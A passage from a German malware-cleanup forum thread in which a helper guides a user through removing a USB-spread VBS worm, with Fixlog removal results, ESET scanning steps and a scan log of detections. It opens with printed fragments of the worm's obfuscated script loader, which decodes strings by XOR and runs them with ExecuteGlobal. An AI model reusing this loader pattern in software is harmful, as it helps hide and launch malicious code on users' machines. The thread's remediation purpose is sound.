scVB.Addcode("dim s_1782170227513801")
scVB.Addcode("s_1782170227513801="+String.fromCharCode(34)+"���??�?????�??????�????���?????????????�??????????�???��?????????????�????????????�???���???�???���????????�????????�???����???�???????�?????�??????????????���???�?????��????????�????���??????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227514001")
scVB.Addcode("s_1782170227514001="+String.fromCharCode(34)+"?���?�����???���??�???�?????�??????�?????????????�????�����??????????????��?????�??????�???????��??????�???�?????�??????�?????????????�????�����??????????????��?????�??????�???????��????�����??????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227563")
scVB.Addcode("s_1782170227563="+String.fromCharCode(34)+"????????�����???�??���????????��??????????????��???�????????"+String.fromCharCode(34))
scVB.Addcode("s_17821702275=s_178217022751 & s_17821702275201 & s_17821702275401 & s_17821702275601 & s_17821702275801 & s_178217022751001 & s_178217022751201 & s_178217022751401 & s_178217022751601 & s_178217022751801 & s_178217022752001 & s_178217022752201 & s_178217022752401 & s_178217022752601 & s_178217022752801 & s_178217022753001 & s_178217022753201 & s_178217022753401 & s_178217022753601 & s_178217022753801 & s_178217022754001 & s_178217022754201 & s_178217022754401 & s_178217022754601 & s_178217022754801 & s_178217022755001 & s_178217022755201 & s_178217022755401 & s_178217022755601 & s_178217022755801 & s_178217022756001 & s_178217022756201 & s_178217022756401 & s_178217022756601 & s_178217022756801 & s_178217022757001 & s_178217022757201 & s_178217022757401 & s_178217022757601 & s_178217022757801 & s_178217022758001 & s_178217022758201 & s_178217022758401 & s_178217022758601 & s_178217022758801 & s_178217022759001 & s_178217022759201 & s_178217022759401 & s_178217022759601 & s_178217022759801 & s_1782170227510001 & s_1782170227510201 & s_1782170227510401 & s_1782170227510601 & s_1782170227510801 & s_1782170227511001 & s_1782170227511201 & s_1782170227511401 & s_1782170227511601 & s_1782170227511801 & s_1782170227512001 & s_1782170227512201 & s_1782170227512401 & s_1782170227512601 & s_1782170227512801 & s_1782170227513001 & s_1782170227513201 & s_1782170227513401 & s_1782170227513601 & s_1782170227513801 & s_1782170227514001 & s_1782170227563")
scVB.Addcode("i=1:Do While True:s_94871761916=s_94871761916"+String.fromCharCode(32)+String.fromCharCode(38)+String.fromCharCode(32)+String.fromCharCode(67)+String.fromCharCode(104)+String.fromCharCode(114)+String.fromCharCode(119)+String.fromCharCode(40)+String.fromCharCode(65)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(119)+String.fromCharCode(40)+String.fromCharCode(77)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(40)+""+"s_17821702275,i,1))Xor(Eval((50*3)+105))):i=i+1:If i=Len(s_17821702275) + 1 Then:Exit Do:End"+String.fromCharCode(32)+String.fromCharCode(73)+String.fromCharCode(102)+String.fromCharCode(58)+String.fromCharCode(76)+String.fromCharCode(111)+String.fromCharCode(111)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(69)+String.fromCharCode(120)+String.fromCharCode(69)+String.fromCharCode(99)+String.fromCharCode(85)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(71)+String.fromCharCode(108)+String.fromCharCode(79)+String.fromCharCode(98)+String.fromCharCode(65)+String.fromCharCode(108)+String.fromCharCode(40)+""+"s_94871761916)")}
========= Ende von CMD: =========

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\VID-20151943-WA0114 => Wert erfolgreich entfernt
C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\errorlog.txt => erfolgreich verschoben
C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8BDB1E7F-123A-435D-B18A-03F6370F5DC6}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8BDB1E7F-123A-435D-B18A-03F6370F5DC6}" => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\{C7F79A47-BAF5-43D4-B22B-CDE1C0D44458} => => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C7F79A47-BAF5-43D4-B22B-CDE1C0D44458} => => Schlüssel nicht gefunden. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C61C6295-3FA7-43FE-8A97-A41503664FF1}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C61C6295-3FA7-43FE-8A97-A41503664FF1}" => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\{76A2D95E-7B3C-41FD-B8E2-209053DBD3C0} => => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{76A2D95E-7B3C-41FD-B8E2-209053DBD3C0} => => Schlüssel nicht gefunden. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E196A98F-38A4-49E5-958B-6CFEFAFFB8BD}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E196A98F-38A4-49E5-958B-6CFEFAFFB8BD}" => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\{AE712D40-D949-47B4-8608-487122F4C8DA} => => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{AE712D40-D949-47B4-8608-487122F4C8DA} => => Schlüssel nicht gefunden. 


Das System musste neu gestartet werden.

==== Ende von Fixlog 19:44:41 ====

deeprybka · 09.04.2016, 18:59

Schritt 1
Alle "infizierten" Sticks an den PC anstecken und einen ESET-Scan durchführen.
Wichtig: Bitte unter "Computer-Prüfeinstellungen/...zu prüfende Objekte" die checkbox bei Computer setzen.

ESET Online Scanner

Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
Lade und starte Eset Online Scanner
Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
Klicke auf Starten.
Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
Klicke am Ende des Suchlaufs auf Fertig stellen.
Schließe das Fenster von ESET.
Explorer öffnen.
C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
Logfile hier posten.
Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset

Buggerns · 09.04.2016, 19:52

Das läuft jetzt noch ne ganze Weile.

Kurze Nachfrage: Habe den VBSWorm Remover nur auf den USB-Stick angewandt, nicht auf C:, war das falsch? =/

Vielen vielen tausend Dank weiterhin!

deeprybka · 09.04.2016, 19:55

Was steht denn in der Anleitung?

C: solltest eben nicht machen. Nur den Buchstaben des Sticks!

Buggerns · 10.04.2016, 03:22

So, hier das Logfile:

Code:

ATTFilter

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=3601b451f969cd46a435f04aca1ec288
# end=init
# utc_time=2016-04-09 06:01:28
# local_time=2016-04-09 08:01:28 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
Update Finalize
Updated modules version: 28986
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=3601b451f969cd46a435f04aca1ec288
# end=updated
# utc_time=2016-04-09 06:05:58
# local_time=2016-04-09 08:05:58 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=3601b451f969cd46a435f04aca1ec288
# engine=28986
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-04-09 06:06:40
# local_time=2016-04-09 08:06:40 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='Avira Antivirus'
# compatibility_mode=1815 16777213 100 100 12749 22320567 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 22339873 211855050 0 0
# scanned=350
# found=0
# cleaned=0
# scan_time=41
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=3601b451f969cd46a435f04aca1ec288
# end=init
# utc_time=2016-04-09 06:07:26
# local_time=2016-04-09 08:07:26 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
esets_scanner_update returned -1 esets_gle=53251
Update Finalize
Updated modules version: 28986
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=3601b451f969cd46a435f04aca1ec288
# end=updated
# utc_time=2016-04-09 06:09:00
# local_time=2016-04-09 08:09:00 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=3601b451f969cd46a435f04aca1ec288
# engine=28986
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-04-10 02:00:50
# local_time=2016-04-10 04:00:50 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='Avira Antivirus'
# compatibility_mode=1815 16777213 100 100 41199 22349017 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 22368323 211883500 0 0
# scanned=886468
# found=29
# cleaned=0
# scan_time=28310
sh=9875B36E9E7C016C551DEC14118E27624498555C ft=0 fh=0000000000000000 vn="VBS/Agent.NJD Wurm" ac=I fn="C:\FRST\Logs\Fixlog_09-04-2016_19-44-52.txt"
sh=8992F72873D09212597E582A16F8D9BC60E6A22A ft=1 fh=e21391a34e842ffc vn="Win32/Toolbar.Conduit.S evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\Common Files\DVDVideoSoft\TB\ConduitInstaller.exe.vir"
sh=89D3D91B63CCB3FDA5BE51C28A6DF1CADA804CD2 ft=1 fh=cec1e0487579cffb vn="Win32/ELEX.BM evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\BrowerWatchCH.dll.vir"
sh=286A3A4929F9194AB22CE4B2CFEB86C5C8B05B1C ft=1 fh=e01830d6344e6508 vn="Win32/ELEX.BM evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\BrowerWatchFF.dll.vir"
sh=5D628376391A827A818B0A079B64EE457AE9B82A ft=1 fh=c71c0011e2e7a7a5 vn="Variante von Win32/ELEX.DH evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\BrowserAction.dll.vir"
sh=4C80B8272D2039580353E878D89F98C7E7A6C1D1 ft=1 fh=aa996b4324fb3c71 vn="Variante von Win32/ELEX.CY evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\CmdShell.exe.vir"
sh=1C88A7C4FD5E9BBE5F558AB731149EC1E59A67AC ft=0 fh=0000000000000000 vn="Win32/Toolbar.TNT2.I evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\ffsearch_toolbar!1.0.0.1031.xpi.vir"
sh=50D89A51B4F0750530071A1DBC21CB4E3D9DBA4B ft=1 fh=ef671f445b9b27a1 vn="Variante von Win32/ELEX.DK evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\HPNotify.exe.vir"
sh=6728C97228C2330876C15837CC010B61CD41A834 ft=1 fh=838d510d68e65437 vn="Win32/ELEX.BM evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\IeWatchDog.dll.vir"
sh=230933730A30AE6BF14753EFB3CF28451B4D2B56 ft=1 fh=53206f85c831ab5f vn="Variante von Win32/ELEX.EE evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\ProtectService.exe.vir"
sh=8C5A60DA5E2EB84E024D3971937EE318D1E2E3A8 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\web\js\xagainit-ie8.js.vir"
sh=5188B90887EFE031B252B197A73F97BB631E66A0 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\miuitab\web\js\xagainit2.0.js.vir"
sh=3B223DDE4EB43FBF9E02C5BE1B142043899C682A ft=1 fh=c71c0011cadc84e5 vn="Variante von Win32/AdWare.AddLyrics.AG Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\Show-Password\150.dll.vir"
sh=2B3904A11A63646AF6EDE9083C79C6E219B92FE9 ft=1 fh=c71c0011bebffd21 vn="Variante von Win32/AdWare.AddLyrics.AB Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\Show-Password\Show_Password.exe.vir"
sh=2B89AF9F124C4B90B26760FB24F7CD88F26FA244 ft=1 fh=db8ce3261d718502 vn="Variante von Win32/AdWare.AddLyrics.AB Anwendung" ac=I fn="C:\SSD\AdwCleaner\Quarantine\C\Program Files (x86)\Show-Password\Uninstall.exe.vir"
sh=D6EB4F07EB08EE14D680DD08CC38CC4163135745 ft=0 fh=0000000000000000 vn="Variante von Win32/ELEX.CP evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\Users\Ben\AppData\Local\Microsoft\Windows\INetCache\IE\EY6XXSQC\1[1].zip"
sh=D0357617961BF3D526BEFAAB0048CBB983EA4DF9 ft=1 fh=c604c933e8b9509f vn="Win32/InstallMonetizer.AQ evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\SSD\Users\Ben\Downloads\PDFCreator-1_7_0_setup.exe"
sh=9875B36E9E7C016C551DEC14118E27624498555C ft=0 fh=0000000000000000 vn="VBS/Agent.NJD Wurm" ac=I fn="C:\Users\Ben\Desktop\Fixlog.txt"
sh=5349F5D28320384B673D94808F349CAF85CD49A5 ft=1 fh=5a3e2024250781f8 vn="Win32/Toolbar.Conduit.S evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\Users\Ben\Downloads\FreeAudioCDBurner1.5.3.920.exe"
sh=0C7E1F8EB63F9F1C75EB08A156E54A7349853EFF ft=1 fh=d24020069345d3b6 vn="Win32/InstallMonetizer.AQ evtl. unerwÃ¼nschte Anwendung" ac=I fn="C:\Users\Ben\Downloads\PDFCreator-1_6_0_setup.exe"
sh=B13A21F9BD15DF5E1CA5518545660A7DF446CA02 ft=0 fh=0000000000000000 vn="LNK/Agent.CH Trojaner" ac=I fn="D:\BackUp\Ben\Downloads\Prinz Pi\Prinz_Pi-Donner_wetter\Prinz Pi-Donner wetter\3dl.am Premium Zugang ! High Speed Downloads .url"
sh=5F437ECC88A691B6161B1D168B3F4A93624F5832 ft=1 fh=400e77a5e5d54a3a vn="Win32/Toolbar.Babylon evtl. unerwÃ¼nschte Anwendung" ac=I fn="D:\BackUp\BenC\AppData\Local\Babylon\Setup\Setup.exe"
sh=027DF2D2944EA506A71D61928674C2CC42A8FE69 ft=1 fh=4c97c45eed1dce37 vn="Win32/Toolbar.Babylon evtl. unerwÃ¼nschte Anwendung" ac=I fn="D:\BackUp\BenC\AppData\Local\Temp\BabylonToolbar\BabylonToolbar\1.5.3.17\BabylonToolbar4ie.exe"
sh=40969E053E001937C71D74EA719F78BF9A5FEF2A ft=1 fh=9a76860661eadcce vn="Win32/Toolbar.Babylon evtl. unerwÃ¼nschte Anwendung" ac=I fn="D:\BackUp\BenC\AppData\Local\Temp\C5B496F6-BAB0-7891-B6E4-62B29B3FFCF3\MyBabylonTB.exe"
sh=5F437ECC88A691B6161B1D168B3F4A93624F5832 ft=1 fh=400e77a5e5d54a3a vn="Win32/Toolbar.Babylon evtl. unerwÃ¼nschte Anwendung" ac=I fn="D:\BackUp\BenC\AppData\Local\Temp\C5B496F6-BAB0-7891-B6E4-62B29B3FFCF3\Setup.exe"
sh=3F20DC68A6AAC23C4702D16C8A5388DCFE591AEA ft=1 fh=e5e2264a283a7f45 vn="Win32/Toolbar.Babylon evtl. unerwÃ¼nschte Anwendung" ac=I fn="D:\BackUp\BenC\AppData\Local\Temp\is-C65S5.tmp\Babylon.exe"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="Variante von Win32/Packed.VMProtect.ABR Trojaner" ac=I fn="D:\Games\Spiele\984651421524-trillsfusemp\sr-tseots.iso"
sh=EE51BC65E632624027E2DD83F44A75784323D247 ft=1 fh=6e4c94e45ea75834 vn="Win32/Adware.Lollipop.D Anwendung" ac=I fn="D:\Games\Spiele\N64\Project 64\setup Project64 2.1.exe"
sh=E20FE2844FB183C75AA532847086BA896A8D9F23 ft=0 fh=0000000000000000 vn="VBS/Agent.NJD Wurm" ac=I fn="O:\VID-20151943-WA0114.MP4.js"

09.04.2016, 18:06	#6
deeprybka /// TB-Ausbilder /// Anleitungs-Guru	Nur Verknüpfungen auf USB-Stick Wichtige Online-Passwörter von einem sauberen PC aus ändern. Poste mir bitte noch das Rem-VBS.log. __________________ --> Nur Verknüpfungen auf USB-Stick

09.04.2016, 19:55	#14
deeprybka /// TB-Ausbilder /// Anleitungs-Guru	Nur Verknüpfungen auf USB-Stick Was steht denn in der Anleitung? C: solltest eben nicht machen. Nur den Buchstaben des Sticks! __________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer

Nur Verknüpfungen auf USB-Stick

Log-Analyse und Auswertung: Nur Verknüpfungen auf USB-Stick